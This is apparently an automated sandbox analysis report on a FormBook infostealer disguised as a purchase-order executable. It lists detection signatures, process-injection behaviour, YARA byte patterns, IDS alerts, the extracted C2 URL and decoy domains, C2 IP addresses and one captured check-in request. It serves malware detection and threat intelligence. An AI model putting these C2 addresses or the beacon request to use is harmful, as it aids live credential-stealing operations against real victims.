
Windows Analysis Report
Purchase order MIPO2425110032.exe

Overview

General Information

Sample name: Purchase order MIPO2425110032.exe
Analysis ID: 1548508
MD5: 85c1c3e112a22e4f23eaf97d86fef355
SHA1: 4922c4f1c57d740ad9f7d46bba1b18f8744277db
SHA256: 88e7becf09f33e1db8fe108dbe9687a13bf1225ecf322a00f2e67b86a8931813
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Reads the DNS cache
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Purchase order MIPO2425110032.exe (PID: 2520 cmdline: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe" MD5: 85C1C3E112A22E4F23EAF97D86FEF355)
    • svchost.exe (PID: 1396 cmdline: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • autochk.exe (PID: 6604 cmdline: "C:\Windows\SysWOW64\autochk.exe" MD5: FC398299F54290D5F35C69E865FD7CC2)
      • ipconfig.exe (PID: 6000 cmdline: "C:\Windows\SysWOW64\ipconfig.exe" MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
        • cmd.exe (PID: 3440 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Source | Rule | Description | Author | Strings
00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Source | Rule | Description | Author | Strings
      0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
          0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x18809:$sqlite3step: 68 34 1C 7B E1
          • 0x1891c:$sqlite3step: 68 34 1C 7B E1
          • 0x18838:$sqlite3text: 68 38 2A 90 C5
          • 0x1895d:$sqlite3text: 68 38 2A 90 C5
          • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18973:$sqlite3blob: 68 53 D8 7F 8C

          System Summary

          Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe", CommandLine: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe", ParentImage: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, ParentProcessId: 2520, ParentProcessName: Purchase order MIPO2425110032.exe, ProcessCommandLine: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe", ProcessId: 1396, ProcessName: svchost.exe
          Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe", CommandLine: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe", ParentImage: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, ParentProcessId: 2520, ParentProcessName: Purchase order MIPO2425110032.exe, ProcessCommandLine: "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe", ProcessId: 1396, ProcessName: svchost.exe
          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2024-11-04T15:28:16.536065+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.5 | 49704 | TCP
          2024-11-04T15:28:55.195375+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.5 | 49895 | TCP
          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2024-11-04T15:29:02.927018+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49943 | 156.235.1.30 | 80 | TCP
          2024-11-04T15:30:04.960785+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49977 | 199.59.243.227 | 80 | TCP

          AV Detection

          Source: Purchase order MIPO2425110032.exe, Avira: detected
          Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.9net88.net/ge07/"], "decoy": ["amyard.shop", "eloshost.xyz", "g18q11a.top", "orensic-vendor-735524320.click", "ithin-ksvodn.xyz", "xhyx.top", "elonix-traceglow.pro", "cillascrewedsedroth.cfd", "wner-nyquh.xyz", "reyhazeusa.shop", "esmellretaperetotal.cfd", "hqm-during.xyz", "pipagtxcorrelo.xyz", "lray-civil.xyz", "apybarameme.xyz", "rbuds.shop", "hild-fcudh.xyz", "rkgexg.top", "estwestcottwines.shop", "giyztm.xyz", "epehr.pics", "lways-vhyrp.xyz", "acifictechnologycctv.net", "iscinddocenaemlynne.cfd", "ridesmaidgiftsboutiqueki.shop", "ubtleclothingco.fashion", "hemicans.xyz", "ebaoge318.top", "zoc-marriage.xyz", "ngeribe2.homes", "oal-ahzgwo.xyz", "eries-htii.xyz", "ool-covers76.xyz", "ecurityemployment.today", "croom.net", "f7y2i9fgm.xyz", "earch-lawyer-consultation.today", "066iwx2t.shop", "ound-omagf.xyz", "ivglass.xyz", "fdyh-investment.xyz", "yegle.net", "eader-aaexvn.xyz", "dvle-father.xyz", "onsfskfsmpfssfpewqdsawqe.xyz", "ffect-xedzl.xyz", "ood-packaging-jobs-brasil.today", "lasterdeals.shop", "ehkd.top", "pm-22-ns-2.click", "ocockbowerlybrawer.cfd", "ostcanadantpl.top", "vrkof-point.xyz", "lsader.app", "nce-ystyx.xyz", "azl.pro", "ea-yogkkb.xyz", "isit-txax.xyz", "rowadservepros.net", "6282.xyz", "roduct-xgky.xyz", "wner-nyquh.xyz", "sfmoreservicesllc.lat", "rasko.net"]}
          Source: Purchase order MIPO2425110032.exe, ReversingLabs: Detection: 21%
          Source: Yara match, File source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
          Source: Purchase order MIPO2425110032.exe, Joe Sandbox ML: detected
          Source: Purchase order MIPO2425110032.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: ipconfig.pdb source: svchost.exe, 00000002.00000003.2190510820.000000000322C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2190826330.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2190955342.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000005.00000002.3285457081.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: svchost.exe, 00000002.00000003.2190510820.000000000322C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2190826330.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2190955342.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3285457081.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Purchase order MIPO2425110032.exe, 00000000.00000003.2045249751.0000000004540000.00000004.00001000.00020000.00000000.sdmp, Purchase order MIPO2425110032.exe, 00000000.00000003.2045727353.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2191013249.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046797348.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2049073833.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2191013249.000000000399E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3286755953.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3286755953.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000003.2192710739.000000000370F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000003.2191001100.0000000003534000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Purchase order MIPO2425110032.exe, 00000000.00000003.2045249751.0000000004540000.00000004.00001000.00020000.00000000.sdmp, Purchase order MIPO2425110032.exe, 00000000.00000003.2045727353.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2191013249.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046797348.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2049073833.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2191013249.000000000399E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000005.00000002.3286755953.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3286755953.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000003.2192710739.000000000370F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000003.2191001100.0000000003534000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3299252701.0000000010B0F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3287464793.0000000003E0F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3285883515.0000000003382000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3299252701.0000000010B0F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3287464793.0000000003E0F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3285883515.0000000003382000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, Code function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B

          Networking

          Source: Network traffic, Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49977 -> 199.59.243.227:80
          Source: Network traffic, Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49977 -> 199.59.243.227:80
          Source: Network traffic, Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49977 -> 199.59.243.227:80
          Source: Network traffic, Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49943 -> 156.235.1.30:80
          Source: Network traffic, Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49943 -> 156.235.1.30:80
          Source: Network traffic, Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49943 -> 156.235.1.30:80
          Source: C:\Windows\explorer.exe, Network Connect: 156.235.1.30 80
          Source: Malware configuration extractor, URLs: www.9net88.net/ge07/
          Source: DNS query: www.6282.xyz
          Source: global traffic, HTTP traffic detected: GET /ge07/?VN9H=FOymHjEy8INtRP80ztKDHy+SkTRNuxtAsSGbgkPqAuR0sH6nXW9AVXeVOt+ErvTzet/o&H0Gx7d=DzrdohnPa4vXCBq HTTP/1.1, Host: www.6282.xyz, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: Joe Sandbox View, ASN Name: CNSERVERSUS CNSERVERSUS
          Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49704
          Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49895
          Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
          Source: global traffic, DNS traffic detected: DNS query: www.sfmoreservicesllc.lat
          Source: global traffic, DNS traffic detected: DNS query: www.6282.xyz
          Source: global traffic, DNS traffic detected: DNS query: www.ostcanadantpl.top
          Source: global traffic, DNS traffic detected: DNS query: www.rkgexg.top
          Source: global traffic, DNS traffic detected: DNS query: www.9net88.net
          Source: explorer.exe, 00000003.00000002.3291923932.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291923932.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000003.00000000.2055532925.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3285665342.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.v
          Source: explorer.exe, 00000003.00000002.3291923932.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291923932.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000003.00000002.3291923932.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291923932.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000003.00000002.3291923932.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291923932.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000002.3291923932.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000000.2059075313.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3290832822.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2059048265.0000000008870000.00000002.00000001.00040000.00000000.sdmp, String found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.6282.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.6282.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.6282.xyz/ge07/www.ostcanadantpl.top
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.6282.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.9net88.net
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.9net88.net/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.9net88.net/ge07/www.ecurityemployment.today
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.9net88.netReferer:
          Source: explorer.exe, 00000003.00000002.3297093239.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2061877271.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095137510.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2061877271.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.dvle-father.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.dvle-father.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.dvle-father.xyz/ge07/www.f7y2i9fgm.xyz
          Source: explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.dvle-father.xyzReferer:
